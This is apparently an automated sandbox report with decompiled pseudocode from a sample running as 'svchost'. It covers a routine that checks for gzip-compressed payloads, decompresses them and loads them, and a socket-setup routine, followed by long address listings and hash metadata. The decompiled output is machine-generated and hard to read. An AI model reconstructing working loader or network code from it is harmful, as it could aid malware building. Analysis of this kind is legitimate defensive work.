                                                                                                                                                                                                                                                                            										_v68 = _v48 - 4;
                                                                                                                                                                                                                                                                            										while(1) {
                                                                                                                                                                                                                                                                            											L19:
                                                                                                                                                                                                                                                                            											_t183 = E04021D10(_t229,  *_v64);
                                                                                                                                                                                                                                                                            											_t272 = _t272 + 4;
                                                                                                                                                                                                                                                                            											_v84 = _t183;
                                                                                                                                                                                                                                                                            											if((_v84 & 0x0000ffff) < 1 || (_v84 & 0x0000ffff) > 0x7d00) {
                                                                                                                                                                                                                                                                            												break;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_v80 = _v84 & 0x0000ffff;
                                                                                                                                                                                                                                                                            											_t187 = E040221A0(_v64 + 8,  &_v80, _v64 + 4, 4);
                                                                                                                                                                                                                                                                            											_t272 = _t272 + 0x10;
                                                                                                                                                                                                                                                                            											if(_t187 != 0) {
                                                                                                                                                                                                                                                                            												_v72 = 0;
                                                                                                                                                                                                                                                                            												_t191 = E04022700(_t210, _t268, _t269, _v64 + (_v84 & 0x0000ffff) + 8, _v68 - (_v84 & 0x0000ffff) + 8, 0x429fb0, 0x254, _v64 + 8, _v80,  &_v72);
                                                                                                                                                                                                                                                                            												_t272 = _t272 + 0x1c;
                                                                                                                                                                                                                                                                            												_v76 = _t191;
                                                                                                                                                                                                                                                                            												if(_v72 != 0) {
                                                                                                                                                                                                                                                                            													while(1) {
                                                                                                                                                                                                                                                                            														_t229 = _v68 - (_v84 & 0x0000ffff) + 8;
                                                                                                                                                                                                                                                                            														if(_v76 != _v68 - (_v84 & 0x0000ffff) + 8) {
                                                                                                                                                                                                                                                                            															break;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														_t195 = E040223A0(_v72, _v76 - 4);
                                                                                                                                                                                                                                                                            														_t272 = _t272 + 8;
                                                                                                                                                                                                                                                                            														_v88 = _t195;
                                                                                                                                                                                                                                                                            														_t229 = _v72 + _v76;
                                                                                                                                                                                                                                                                            														if(_v88 !=  *((intOrPtr*)(_v72 + _v76 - 4))) {
                                                                                                                                                                                                                                                                            															L41:
                                                                                                                                                                                                                                                                            															if(0 != 0) {
                                                                                                                                                                                                                                                                            																continue;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															L42:
                                                                                                                                                                                                                                                                            															if(_v72 != 0) {
                                                                                                                                                                                                                                                                            																_v124 = _v72;
                                                                                                                                                                                                                                                                            																_t229 = _v124;
                                                                                                                                                                                                                                                                            																E04020CC0(_v124);
                                                                                                                                                                                                                                                                            																_t272 = _t272 + 4;
                                                                                                                                                                                                                                                                            																_v72 = 0x666;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															if(0 != 0) {
                                                                                                                                                                                                                                                                            																goto L19;
                                                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                                                            																goto L45;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														while(1) {
                                                                                                                                                                                                                                                                            															L29:
                                                                                                                                                                                                                                                                            															_v100 = _v72;
                                                                                                                                                                                                                                                                            															_t229 = _v76 - 4;
                                                                                                                                                                                                                                                                            															_v104 = _v76 - 4;
                                                                                                                                                                                                                                                                            															if(( *_v100 & 0x0000ffff) != 0x8b1f) {
                                                                                                                                                                                                                                                                            																break;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															_t229 = _v100 + _v104;
                                                                                                                                                                                                                                                                            															_v108 =  *((intOrPtr*)(_v100 + _v104 - 4));
                                                                                                                                                                                                                                                                            															if(_v108 >= 1) {
                                                                                                                                                                                                                                                                            																_t201 = E04020CE0(_v108);
                                                                                                                                                                                                                                                                            																_t272 = _t272 + 4;
                                                                                                                                                                                                                                                                            																_v116 = _t201;
                                                                                                                                                                                                                                                                            																_t229 = _v116;
                                                                                                                                                                                                                                                                            																_v96 = _v116;
                                                                                                                                                                                                                                                                            																if(_v96 != 0) {
                                                                                                                                                                                                                                                                            																	_v92 = _v108;
                                                                                                                                                                                                                                                                            																	_t229 = _v100;
                                                                                                                                                                                                                                                                            																	_t204 = E0401E240(_t210, _t268, _t269, _v96,  &_v92, _v100, _v104);
                                                                                                                                                                                                                                                                            																	_t272 = _t272 + 0x10;
                                                                                                                                                                                                                                                                            																	if(_t204 == 0) {
                                                                                                                                                                                                                                                                            																		_t205 = E04020CE0(8);
                                                                                                                                                                                                                                                                            																		_t272 = _t272 + 4;
                                                                                                                                                                                                                                                                            																		_v120 = _t205;
                                                                                                                                                                                                                                                                            																		if(_v120 == 0) {
                                                                                                                                                                                                                                                                            																			_v144 = 0;
                                                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                                                            																			_v144 = E0401F4E0(_v120);
                                                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                                                            																		_v12 = _v144;
                                                                                                                                                                                                                                                                            																		E0401F9F0(_t210, _v12, _v108, _v96, _v108, 0);
                                                                                                                                                                                                                                                                            																		_v37 = 1;
                                                                                                                                                                                                                                                                            																		_t229 = 0;
                                                                                                                                                                                                                                                                            																		if(0 != 0) {
                                                                                                                                                                                                                                                                            																			continue;
                                                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                                                            																			goto L41;
                                                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                                                            																	goto L41;
                                                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                                                            																goto L41;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															goto L41;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														goto L41;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													goto L42;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												goto L45;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										goto L45;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v36 = _v52;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(0 != 0) {
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L51:
                                                                                                                                                                                                                                                                            					if(_v8 != 0) {
                                                                                                                                                                                                                                                                            						_t246 = _v8;
                                                                                                                                                                                                                                                                            						_v136 = _v8;
                                                                                                                                                                                                                                                                            						_v132 = _v136;
                                                                                                                                                                                                                                                                            						if(_v132 == 0) {
                                                                                                                                                                                                                                                                            							_v148 = 0;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v148 = E04004EA0(_v132, 1);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v8 = 0x666;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return E04006C8C(_v12, _t210, _v20 ^ _t270, _t246, _t268, _t269);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L51;
                                                                                                                                                                                                                                                                            			}























































                                                                                                                                                                                                                                                                            0x04026c40
                                                                                                                                                                                                                                                                            0x04026c40
                                                                                                                                                                                                                                                                            0x04026c40
                                                                                                                                                                                                                                                                            0x04026c50
                                                                                                                                                                                                                                                                            0x04026c58
                                                                                                                                                                                                                                                                            0x04026c61
                                                                                                                                                                                                                                                                            0x04026c64
                                                                                                                                                                                                                                                                            0x04026c6a
                                                                                                                                                                                                                                                                            0x04026c6d
                                                                                                                                                                                                                                                                            0x04026c76
                                                                                                                                                                                                                                                                            0x04026c7b
                                                                                                                                                                                                                                                                            0x04026c7e
                                                                                                                                                                                                                                                                            0x04026c85
                                                                                                                                                                                                                                                                            0x04026c97
                                                                                                                                                                                                                                                                            0x04026c87
                                                                                                                                                                                                                                                                            0x04026c8f
                                                                                                                                                                                                                                                                            0x04026c8f
                                                                                                                                                                                                                                                                            0x04026ca7
                                                                                                                                                                                                                                                                            0x04026caa
                                                                                                                                                                                                                                                                            0x04026cc1
                                                                                                                                                                                                                                                                            0x04026cc8
                                                                                                                                                                                                                                                                            0x04026ccd
                                                                                                                                                                                                                                                                            0x04026cd4
                                                                                                                                                                                                                                                                            0x04026cdb
                                                                                                                                                                                                                                                                            0x04026cdf
                                                                                                                                                                                                                                                                            0x04026cf1
                                                                                                                                                                                                                                                                            0x04026cfd
                                                                                                                                                                                                                                                                            0x04026d04
                                                                                                                                                                                                                                                                            0x04026d11
                                                                                                                                                                                                                                                                            0x04026d1a
                                                                                                                                                                                                                                                                            0x04026d26
                                                                                                                                                                                                                                                                            0x04026d2d
                                                                                                                                                                                                                                                                            0x04026d3a
                                                                                                                                                                                                                                                                            0x04026d41
                                                                                                                                                                                                                                                                            0x04026d53
                                                                                                                                                                                                                                                                            0x04026d5a
                                                                                                                                                                                                                                                                            0x04026d67
                                                                                                                                                                                                                                                                            0x04026d80
                                                                                                                                                                                                                                                                            0x04026d85
                                                                                                                                                                                                                                                                            0x04026d88
                                                                                                                                                                                                                                                                            0x04026d8f
                                                                                                                                                                                                                                                                            0x04026fd8
                                                                                                                                                                                                                                                                            0x04026fd8
                                                                                                                                                                                                                                                                            0x04026fde
                                                                                                                                                                                                                                                                            0x04026fe6
                                                                                                                                                                                                                                                                            0x04026fe6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026d9f
                                                                                                                                                                                                                                                                            0x04026dad
                                                                                                                                                                                                                                                                            0x04026db2
                                                                                                                                                                                                                                                                            0x04026db5
                                                                                                                                                                                                                                                                            0x04026dc0
                                                                                                                                                                                                                                                                            0x04026fb9
                                                                                                                                                                                                                                                                            0x04026fbd
                                                                                                                                                                                                                                                                            0x04026fc2
                                                                                                                                                                                                                                                                            0x04026fc9
                                                                                                                                                                                                                                                                            0x04026fce
                                                                                                                                                                                                                                                                            0x04026fd1
                                                                                                                                                                                                                                                                            0x04026fd1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026fbd
                                                                                                                                                                                                                                                                            0x04026dcc
                                                                                                                                                                                                                                                                            0x04026dd2
                                                                                                                                                                                                                                                                            0x04026dd5
                                                                                                                                                                                                                                                                            0x04026dd8
                                                                                                                                                                                                                                                                            0x04026dd8
                                                                                                                                                                                                                                                                            0x04026dde
                                                                                                                                                                                                                                                                            0x04026de3
                                                                                                                                                                                                                                                                            0x04026de6
                                                                                                                                                                                                                                                                            0x04026df1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026e08
                                                                                                                                                                                                                                                                            0x04026e1f
                                                                                                                                                                                                                                                                            0x04026e24
                                                                                                                                                                                                                                                                            0x04026e29
                                                                                                                                                                                                                                                                            0x04026e30
                                                                                                                                                                                                                                                                            0x04026e69
                                                                                                                                                                                                                                                                            0x04026e6e
                                                                                                                                                                                                                                                                            0x04026e71
                                                                                                                                                                                                                                                                            0x04026e78
                                                                                                                                                                                                                                                                            0x04026e7f
                                                                                                                                                                                                                                                                            0x04026e89
                                                                                                                                                                                                                                                                            0x04026e8e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026ea0
                                                                                                                                                                                                                                                                            0x04026ea5
                                                                                                                                                                                                                                                                            0x04026ea8
                                                                                                                                                                                                                                                                            0x04026eae
                                                                                                                                                                                                                                                                            0x04026eb7
                                                                                                                                                                                                                                                                            0x04026f8a
                                                                                                                                                                                                                                                                            0x04026f8c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026f92
                                                                                                                                                                                                                                                                            0x04026f96
                                                                                                                                                                                                                                                                            0x04026f9b
                                                                                                                                                                                                                                                                            0x04026f9e
                                                                                                                                                                                                                                                                            0x04026fa2
                                                                                                                                                                                                                                                                            0x04026fa7
                                                                                                                                                                                                                                                                            0x04026faa
                                                                                                                                                                                                                                                                            0x04026faa
                                                                                                                                                                                                                                                                            0x04026fb3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026ebd
                                                                                                                                                                                                                                                                            0x04026ebd
                                                                                                                                                                                                                                                                            0x04026ec0
                                                                                                                                                                                                                                                                            0x04026ec6
                                                                                                                                                                                                                                                                            0x04026ec9
                                                                                                                                                                                                                                                                            0x04026ed7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026ee1
                                                                                                                                                                                                                                                                            0x04026ee7
                                                                                                                                                                                                                                                                            0x04026eee
                                                                                                                                                                                                                                                                            0x04026ef9
                                                                                                                                                                                                                                                                            0x04026efe
                                                                                                                                                                                                                                                                            0x04026f01
                                                                                                                                                                                                                                                                            0x04026f04
                                                                                                                                                                                                                                                                            0x04026f07
                                                                                                                                                                                                                                                                            0x04026f0e
                                                                                                                                                                                                                                                                            0x04026f15
                                                                                                                                                                                                                                                                            0x04026f1c
                                                                                                                                                                                                                                                                            0x04026f28
                                                                                                                                                                                                                                                                            0x04026f2d
                                                                                                                                                                                                                                                                            0x04026f32
                                                                                                                                                                                                                                                                            0x04026f38
                                                                                                                                                                                                                                                                            0x04026f3d
                                                                                                                                                                                                                                                                            0x04026f40
                                                                                                                                                                                                                                                                            0x04026f47
                                                                                                                                                                                                                                                                            0x04026f59
                                                                                                                                                                                                                                                                            0x04026f49
                                                                                                                                                                                                                                                                            0x04026f51
                                                                                                                                                                                                                                                                            0x04026f51
                                                                                                                                                                                                                                                                            0x04026f69
                                                                                                                                                                                                                                                                            0x04026f79
                                                                                                                                                                                                                                                                            0x04026f7e
                                                                                                                                                                                                                                                                            0x04026f82
                                                                                                                                                                                                                                                                            0x04026f84
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026f84
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026f34
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026f10
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026ef0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026ed9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026e90
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026e7a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026e2b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026dff
                                                                                                                                                                                                                                                                            0x04026d8f
                                                                                                                                                                                                                                                                            0x04026d5f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026d5f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026d2f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026d06
                                                                                                                                                                                                                                                                            0x04026ff0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04026ff6
                                                                                                                                                                                                                                                                            0x04026ffa
                                                                                                                                                                                                                                                                            0x04026ffc
                                                                                                                                                                                                                                                                            0x04026fff
                                                                                                                                                                                                                                                                            0x0402700b
                                                                                                                                                                                                                                                                            0x04027012
                                                                                                                                                                                                                                                                            0x04027026
                                                                                                                                                                                                                                                                            0x04027014
                                                                                                                                                                                                                                                                            0x0402701e
                                                                                                                                                                                                                                                                            0x0402701e
                                                                                                                                                                                                                                                                            0x04027030
                                                                                                                                                                                                                                                                            0x04027030
                                                                                                                                                                                                                                                                            0x04027047
                                                                                                                                                                                                                                                                            0x04027047
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04026C8A
                                                                                                                                                                                                                                                                            • codecvt.LIBCPMTD ref: 04027019
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Iterator_baseIterator_base::_codecvtstd::_
                                                                                                                                                                                                                                                                            • String ID: ir\
                                                                                                                                                                                                                                                                            • API String ID: 3817610042-1854106103
                                                                                                                                                                                                                                                                            • Opcode ID: 013e048e50c599f190f400021c24b0a8665a3a58535e8dc2fb7aab1ea6fdaade
                                                                                                                                                                                                                                                                            • Instruction ID: 71bce72721c98fd701a8830471f0d2f2c7e2f459ebc33f17165b16ca64a09b40
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 013e048e50c599f190f400021c24b0a8665a3a58535e8dc2fb7aab1ea6fdaade
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9AD118B0D00228DBDF54DFE8DA94BEDBBB1BF48308F108569E405BB280E735A945DB51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 18%
                                                                                                                                                                                                                                                                            			E04020920(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				short _v42;
                                                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                                                                                                                            				intOrPtr _t106;
                                                                                                                                                                                                                                                                            				void* _t126;
                                                                                                                                                                                                                                                                            				intOrPtr _t140;
                                                                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t163 = __esi;
                                                                                                                                                                                                                                                                            				_t162 = __edi;
                                                                                                                                                                                                                                                                            				_t126 = __ebx;
                                                                                                                                                                                                                                                                            				_v28 =  *0x429024 ^ _t164;
                                                                                                                                                                                                                                                                            				_v64 = __ecx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                            					_v16 = 0xffffffff;
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					while(_a4 != 0 && (_a8 & 0x0000ffff) != 0) {
                                                                                                                                                                                                                                                                            						_v16 =  *0x425284(2, 1, 6, 0, 0, 1);
                                                                                                                                                                                                                                                                            						__eflags = _v16 - 0xffffffff;
                                                                                                                                                                                                                                                                            						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                            							_v20 = 0;
                                                                                                                                                                                                                                                                            							 *0x42527c(_v16, 0xffff, 0x1001,  &_v20, 4);
                                                                                                                                                                                                                                                                            							E04007010(_t162,  &_v44, 0, 0x10);
                                                                                                                                                                                                                                                                            							_t165 = _t165 + 0xc;
                                                                                                                                                                                                                                                                            							_v44 = 2;
                                                                                                                                                                                                                                                                            							_v40 = 0;
                                                                                                                                                                                                                                                                            							_v42 = 0;
                                                                                                                                                                                                                                                                            							_t101 =  *0x425280(_v16,  &_v44, 0x10);
                                                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                                                            							if(_t101 == 0) {
                                                                                                                                                                                                                                                                            								_t102 = E04020CE0(0x5c);
                                                                                                                                                                                                                                                                            								_t165 = _t165 + 4;
                                                                                                                                                                                                                                                                            								_v52 = _t102;
                                                                                                                                                                                                                                                                            								__eflags = _v52;
                                                                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                                                                            									_v68 = 0;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v68 = E04005630(_v52, __eflags);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v12 = _v68;
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_v12 + 0x34)) = 0x77777777;
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_v12 + 0x54)) = 2;
                                                                                                                                                                                                                                                                            								_v48 =  *0x42516c(_v16,  *((intOrPtr*)(_v64 + 8)), _v12, 0);
                                                                                                                                                                                                                                                                            								_t106 = _v64;
                                                                                                                                                                                                                                                                            								__eflags = _v48 -  *((intOrPtr*)(_t106 + 8));
                                                                                                                                                                                                                                                                            								if(_v48 ==  *((intOrPtr*)(_t106 + 8))) {
                                                                                                                                                                                                                                                                            									E04007010(_t162,  &_v44, 0, 0x10);
                                                                                                                                                                                                                                                                            									_v44 = 2;
                                                                                                                                                                                                                                                                            									_v40 = _a4;
                                                                                                                                                                                                                                                                            									_v42 =  *0x425278(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_v12 + 0x30)) = _v64;
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_v12 + 0x28)) = _v16;
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_v12 + 0x2c)) = 2;
                                                                                                                                                                                                                                                                            									E04006CA0(_t126, _t162, _t163, _v12 + 0x38,  &_v44);
                                                                                                                                                                                                                                                                            									_t165 = _t165 + 0x18;
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_v12 + 0x48)) = 0x10;
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_v12 + 0x18)) =  *((intOrPtr*)(_v12 + 0x18)) + 1;
                                                                                                                                                                                                                                                                            									_t140 = _v64;
                                                                                                                                                                                                                                                                            									_t161 =  *((intOrPtr*)(_t140 + 0xc));
                                                                                                                                                                                                                                                                            									_v24 =  *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xc))))(_v16, _v12 + 0x38,  *((intOrPtr*)(_v12 + 0x48)), 0, 0, 0, _v12, 0x10);
                                                                                                                                                                                                                                                                            									__eflags = _v24;
                                                                                                                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                                                                                                                            										L17:
                                                                                                                                                                                                                                                                            										_v8 = E04006410(_t126,  *((intOrPtr*)(_v64 + 4)), _t162, _t163, __eflags, _v12, 0);
                                                                                                                                                                                                                                                                            										_t161 = 0;
                                                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                                                            										if(0 != 0) {
                                                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										goto L18;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									__eflags =  *0x425274() - 0x3e5;
                                                                                                                                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L18;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L18;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L18:
                                                                                                                                                                                                                                                                            					if(_v8 == 0) {
                                                                                                                                                                                                                                                                            						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                            							 *0x42524c(_v16);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_v12 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                            							_v60 = _v12;
                                                                                                                                                                                                                                                                            							_t161 = _v60;
                                                                                                                                                                                                                                                                            							_v56 = _v60;
                                                                                                                                                                                                                                                                            							if(_v56 == 0) {
                                                                                                                                                                                                                                                                            								_v72 = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v72 = E04006A90(_v56, 1);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v12 = 0x666;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} while (0 != 0);
                                                                                                                                                                                                                                                                            				return E04006C8C(_v8, _t126, _v28 ^ _t164, _t161, _t162, _t163);
                                                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                                                            0x04020920
                                                                                                                                                                                                                                                                            0x04020920
                                                                                                                                                                                                                                                                            0x04020920
                                                                                                                                                                                                                                                                            0x0402092d
                                                                                                                                                                                                                                                                            0x04020930
                                                                                                                                                                                                                                                                            0x04020933
                                                                                                                                                                                                                                                                            0x0402093a
                                                                                                                                                                                                                                                                            0x0402093a
                                                                                                                                                                                                                                                                            0x04020941
                                                                                                                                                                                                                                                                            0x04020948
                                                                                                                                                                                                                                                                            0x0402096d
                                                                                                                                                                                                                                                                            0x04020970
                                                                                                                                                                                                                                                                            0x04020974
                                                                                                                                                                                                                                                                            0x0402097b
                                                                                                                                                                                                                                                                            0x04020996
                                                                                                                                                                                                                                                                            0x040209a4
                                                                                                                                                                                                                                                                            0x040209a9
                                                                                                                                                                                                                                                                            0x040209b1
                                                                                                                                                                                                                                                                            0x040209b5
                                                                                                                                                                                                                                                                            0x040209be
                                                                                                                                                                                                                                                                            0x040209cc
                                                                                                                                                                                                                                                                            0x040209d2
                                                                                                                                                                                                                                                                            0x040209d4
                                                                                                                                                                                                                                                                            0x040209dd
                                                                                                                                                                                                                                                                            0x040209e2
                                                                                                                                                                                                                                                                            0x040209e5
                                                                                                                                                                                                                                                                            0x040209e8
                                                                                                                                                                                                                                                                            0x040209ec
                                                                                                                                                                                                                                                                            0x040209fb
                                                                                                                                                                                                                                                                            0x040209ee
                                                                                                                                                                                                                                                                            0x040209f6
                                                                                                                                                                                                                                                                            0x040209f6
                                                                                                                                                                                                                                                                            0x04020a05
                                                                                                                                                                                                                                                                            0x04020a0b
                                                                                                                                                                                                                                                                            0x04020a15
                                                                                                                                                                                                                                                                            0x04020a33
                                                                                                                                                                                                                                                                            0x04020a36
                                                                                                                                                                                                                                                                            0x04020a3c
                                                                                                                                                                                                                                                                            0x04020a3f
                                                                                                                                                                                                                                                                            0x04020a4e
                                                                                                                                                                                                                                                                            0x04020a5b
                                                                                                                                                                                                                                                                            0x04020a62
                                                                                                                                                                                                                                                                            0x04020a70
                                                                                                                                                                                                                                                                            0x04020a7a
                                                                                                                                                                                                                                                                            0x04020a83
                                                                                                                                                                                                                                                                            0x04020a89
                                                                                                                                                                                                                                                                            0x04020a9d
                                                                                                                                                                                                                                                                            0x04020aa2
                                                                                                                                                                                                                                                                            0x04020aa8
                                                                                                                                                                                                                                                                            0x04020abb
                                                                                                                                                                                                                                                                            0x04020ada
                                                                                                                                                                                                                                                                            0x04020add
                                                                                                                                                                                                                                                                            0x04020ae2
                                                                                                                                                                                                                                                                            0x04020ae5
                                                                                                                                                                                                                                                                            0x04020ae9
                                                                                                                                                                                                                                                                            0x04020afa
                                                                                                                                                                                                                                                                            0x04020b0b
                                                                                                                                                                                                                                                                            0x04020b0e
                                                                                                                                                                                                                                                                            0x04020b0e
                                                                                                                                                                                                                                                                            0x04020b10
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04020b10
                                                                                                                                                                                                                                                                            0x04020af1
                                                                                                                                                                                                                                                                            0x04020af6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
